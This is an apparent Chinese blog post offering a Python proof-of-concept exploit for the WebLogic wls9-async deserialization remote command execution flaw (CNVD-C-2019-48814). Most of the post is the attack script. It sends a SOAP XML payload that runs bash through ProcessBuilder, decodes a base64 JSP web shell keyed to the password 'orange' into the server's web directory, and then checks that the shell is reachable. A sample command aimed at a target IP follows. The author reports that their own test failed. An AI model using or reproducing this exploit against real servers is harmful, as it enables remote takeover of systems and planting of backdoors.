zoukankan      html  css  js  c++  java

  • CNVD-C-2019-48814 漏洞

    CNVD-C-2019-48814

    WebLogic wls9-async反序列化远程命令执行漏洞

    网上均有详细的说明(https://github.com/jas502n/CNVD-C-2019-48814)

    (https://github.com/SkyBlueEternal/CNVD-C-2019-48814-or-CNNVD-201904-961)

    利用payload 写个 POC 。

    利用:url+_async/AsyncResponseService ,判断状态,POST payload  判断是否成功get shell 。

    import requests
import sys
def poc():
    url =str(sys.argv[1])
    path ="/_async/AsyncResponseService"
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36",
        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        'Content-Type': "text/xml"
        }
    payload = """
    <?xml version="1.0" encoding="Utf-8"?>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
    <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java version="1.8.0_131" class="java.beans.xmlDecoder">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>bash</string>
    </void>
    <void index="1">
    <string>-c</string>
    </void>
    <void index="2">
    <string>echo Jmx0OyUNCiAgICAgICAgamF2YS5pby5JbnB1dFN0cmVhbSBpbiA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoIm9yYW5nZSIpKS5nZXRJbnB1dFN0cmVhbSgpOw0KICAgICAgICBpbnQgYSA9IC0xOyAgICAgICAgICANCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgDQogICAgICAgIG91dC5wcmludCgiJmx0O3ByZSZndDsiKTsgICAgICAgICAgDQogICAgICAgIHdoaWxlKChhPWluLnJlYWQoYikpIT0tMSl7DQogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgb3V0LnByaW50KCImbHQ7L3ByZSZndDsiKTsNCiUmZ3Q7DQo=|base64 -d >servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string>
    </void>
    </array>
    <void method="start"/>
    </void>
    </java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body>
    <asy:onAsyncDelivery/>
    </soapenv:Body>
    </soapenv:Envelope>
    """
    try:
        request = requests.post(url+path,data=payload,headers=headers)
        print '[+] exploit url: %s_async/AsyncResponseService' % url
        if request.status_code == 202:
            print '[+] %s  exploit success!' % url
            request2 = requests.get(url+'/_async/shell.jsp')
            if request2.status_code == 200:
                print '[+]   get shell: %s/_async/shell.jsp  pass is orange ' % url
            else:
                print '[-]   get shell fail '
        else:
            print '[-] %s  exploit faile' % url
    except:
        print '[-] %s  address cannot connect' % url
if __name__=='__main__':
    poc()

    攻击:

    python CNVD-C-2019-48814.py http://111.111.111.111:7001/

    攻击成功之后,可以获得一个shell GET 密码是orange 

     

    测试失败。
  • 相关阅读:
    2、词法分析--4、字面值--2、字符串拼接
    2、词法分析--3、标识符和关键字
    2、词法分析-- 1、行结构
    git本机服务器配置(四):git+TortoiseGit+gitblit配置本机服务器
    git本机服务器配置(三):Gitblit的安装
    git本机服务器配置(二):TortoiseGit的安装
    git本机服务器配置(一):git的安装
    python 中 dlib库的安装
    正向代理和方向代理的区别和使用
    php应用路径变量问题总结
  • 原文地址:https://www.cnblogs.com/Oran9e/p/10772713.html
Copyright © 2011-2022 走看看